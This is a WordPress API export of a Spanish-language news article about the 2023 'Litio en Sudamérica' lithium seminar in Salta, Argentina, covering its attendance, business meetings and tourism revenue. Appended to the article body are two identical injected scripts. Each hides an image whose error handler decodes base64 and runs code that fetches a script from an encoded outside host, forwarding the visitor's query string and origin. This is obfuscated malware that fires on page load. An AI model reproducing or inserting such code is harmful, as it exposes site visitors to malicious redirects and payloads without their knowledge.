{"id":2986,"date":"2023-08-11T10:26:04","date_gmt":"2023-08-11T13:26:04","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2986"},"modified":"2025-08-14T00:10:35","modified_gmt":"2025-08-14T03:10:35","slug":"salta-brillo-como-epicentro-de-innovacion-y-atractivo-turistico-en-el-evento-de-litio","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2986","title":{"rendered":"Salta brill\u00f3 como epicentro de innovaci\u00f3n y atractivo tur\u00edstico en el evento de Litio"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-cyan-bluish-gray-color has-text-color has-background\" style=\"background-color:#63012a\"><em>El Seminario Internacional \u00abLitio en Sudam\u00e9rica\u00bb que se desarroll\u00f3 en la provincia marc\u00f3 un record hist\u00f3rico tras congregar a m\u00e1s de 1700 referentes globales del litio. Adem\u00e1s se puso en relevancia las fortalezas de Salta como un destino de reuniones excepcional.<\/em><\/h5>\n\n\n\n<p>Durante dos d\u00edas, la ciudad de Salta fue epicentro mundial del conocimiento y la innovaci\u00f3n en el \u00e1mbito del litio al ser sede de la XII Edici\u00f3n del Seminario Internacional \u00abLitio en Sudam\u00e9rica\u00bb, organizado por Panorama Minero.&nbsp;<\/p>\n\n\n\n<p>M\u00e1s de 1700 asistentes provenientes de todas las latitudes del planeta se congregaron en este encuentro de negocios y simposio de la esfera del litio, en el que se&nbsp; destac\u00f3 el posicionamiento de Salta en la industria tur\u00edstica y econ\u00f3mica.<\/p>\n\n\n\n<figure class=\"wp-block-embed alignright is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Salta brill\u00f3 como epicentro de innovaci\u00f3n y atractivo tur\u00edstico en el evento de Litio\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/9NMZFfomjyU?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>Participaron renombrados inversores, proveedores, compa\u00f1\u00edas mineras, tecnol\u00f3gicas, desarrolladoras, oradores internacionales,&nbsp; actores gubernamentales, acad\u00e9micos y l\u00edderes locales.<\/p>\n\n\n\n<p>El gobernador&nbsp;<strong>Gustavo<\/strong>&nbsp;<strong>S\u00e1enz<\/strong>, junto a sus pares de Catamarca,&nbsp;<strong>Ra\u00fal<\/strong>&nbsp;<strong>Jalil<\/strong>&nbsp;y&nbsp;<strong>Gerardo<\/strong>&nbsp;<strong>Morales<\/strong>&nbsp;de Jujuy hicieron la apertura del Congreso para luego dar paso al desarrollo de un nutrido programa con temas fundamentales vinculados a la tem\u00e1tica.<\/p>\n\n\n\n<p>Desde la evaluaci\u00f3n del estado actual de los proyectos productivos hasta la predicci\u00f3n de las tendencias de precios y del mercado. Aspectos como la interacci\u00f3n entre la econom\u00eda global y el litio, el desarrollo tecnol\u00f3gico y su repercusi\u00f3n en la industria, as\u00ed como la importancia de la vinculaci\u00f3n con las comunidades locales fueron t\u00f3picos abordados. Adem\u00e1s, se subrayaron los avances en electrificaci\u00f3n y sostenibilidad, dos pilares cruciales del sector.<\/p>\n\n\n\n<p>En esta edici\u00f3n, el evento logr\u00f3 establecer un hito al reunir a m\u00e1s de 1700 participantes. Entre ellos, m\u00e1s de 1100 eran asistentes argentinos, quienes se unieron a una audiencia internacional, que abarcaba desde Estados Unidos hasta Rusia, pasando por Chile, Francia, China, B\u00e9lgica, Venezuela, Bolivia, Australia, Nueva Zelanda, Corea del Sur, Reino Unido, M\u00e9xico, India, Per\u00fa, Canad\u00e1, Alemania, Suiza, Italia, Pa\u00edses Bajos, Irlanda y Colombia.<\/p>\n\n\n\n<p>Durante el encuentro, los especialistas analizaron diversas perspectivas en torno a las nuevas tecnolog\u00edas para el cuidado del recurso h\u00eddrico. Uno de los expertos destacados, Joe Lowry, explor\u00f3 la historia de la industria del litio desde sus inicios con la introducci\u00f3n de los autom\u00f3viles el\u00e9ctricos por parte de la empresa Tesla, y tambi\u00e9n discuti\u00f3 los desarrollos geopol\u00edticos que la han moldeado. Estos enfoques en la sostenibilidad y la evoluci\u00f3n hist\u00f3rica agregaron un valor a\u00fan mayor al ya enriquecedor programa del seminario.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8373-salta-brillo-como-epicentro-de-innovacion-y-atractivo-turistico-en-el-evento-de-litio-20230811110450.jpg\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8373-salta-brillo-como-epicentro-de-innovacion-y-atractivo-turistico-en-el-evento-de-litio-20230811110450.jpg\" alt=\"Salta brill\u00f3 como epicentro de innovaci\u00f3n y atractivo tur\u00edstico en el evento de Litio\" width=\"428\" height=\"285\"\/><\/a><\/figure><\/div>\n\n\n<p><strong>Exitosa<\/strong>&nbsp;<strong>Ronda<\/strong>&nbsp;<strong>de<\/strong>&nbsp;<strong>Negocios<\/strong><\/p>\n\n\n\n<p>Tras propiciar m\u00e1s de 3000 reuniones comerciales entre empresas mineras y proveedores, el seminario super\u00f3 el objetivo generar conexiones y la exploraci\u00f3n d&nbsp;oportunidades comerciales en el siempre cambiante mundo del litio.<\/p>\n\n\n\n<p>Un distintivo inconfundible de este evento radica en su firme compromiso con las regiones l\u00edderes en el desarrollo de la industria del litio. El Seminario Internacional Litio en Sudam\u00e9rica adopta una naturaleza itinerante, realiz\u00e1ndose en las provincias de Salta, Jujuy y Catamarca, en Argentina.<\/p>\n\n\n\n<p>Estas provincias, conformando el Tri\u00e1ngulo del Litio, tienen un rol crucial en la producci\u00f3n de este recurso estrat\u00e9gico.<\/p>\n\n\n\n<p>La trascendencia lograda en la XII edici\u00f3n del Seminario Internacional \u00abLitio en Sudam\u00e9rica\u00bb no solo evidencia la creciente importancia de la industria del litio en la regi\u00f3n, sino que tambi\u00e9n subraya su influencia en el panorama econ\u00f3mico y tecnol\u00f3gico mundial.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8374-salta-brillo-como-epicentro-de-innovacion-y-atractivo-turistico-en-el-evento-de-litio.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8374-salta-brillo-como-epicentro-de-innovacion-y-atractivo-turistico-en-el-evento-de-litio.jpg\" alt=\"Salta brill\u00f3 como epicentro de innovaci\u00f3n y atractivo tur\u00edstico en el evento de Litio\" width=\"317\" height=\"211\"\/><\/a><\/figure><\/div>\n\n\n<p><strong>Impacto<\/strong>&nbsp;<strong>econ\u00f3mico<\/strong>&nbsp;y&nbsp;<strong>tur\u00edstico<\/strong><\/p>\n\n\n\n<p>El impacto econ\u00f3mico generado por este evento se vio claramente reflejado en la demanda de servicios hoteleros, gastron\u00f3micos y de transporte por parte los visitantes que llegaron a Salta. La provincia, reconocida por su entorno natural y su riqueza cultural, ofici\u00f3 como anfitriona excepcional, demostrando su capacidad para satisfacer las necesidades de un evento de tal magnitud y generar la opini\u00f3n favorable del p\u00fablico participante.<\/p>\n\n\n\n<p>En este sentido, la industria tur\u00edstica derivada del seminario gener\u00f3 un impacto econ\u00f3mico aproximadamente tres veces mayor que el turismo convencional.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Seminario Internacional \u00abLitio en Sudam\u00e9rica\u00bb que se desarroll\u00f3 en la provincia marc\u00f3 un record hist\u00f3rico tras congregar a m\u00e1s de 1700 referentes globales del litio. Adem\u00e1s se puso en relevancia las fortalezas de Salta como un destino de reuniones excepcional. Durante dos d\u00edas, la ciudad de Salta fue epicentro mundial del conocimiento y la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2987,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[20,6],"tags":[],"class_list":{"0":"post-2986","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-empresas","8":"category-temas-relacionados"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2986"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2986"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2986\/revisions"}],"predecessor-version":[{"id":6994,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2986\/revisions\/6994"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2987"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2986"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2986"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2986"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}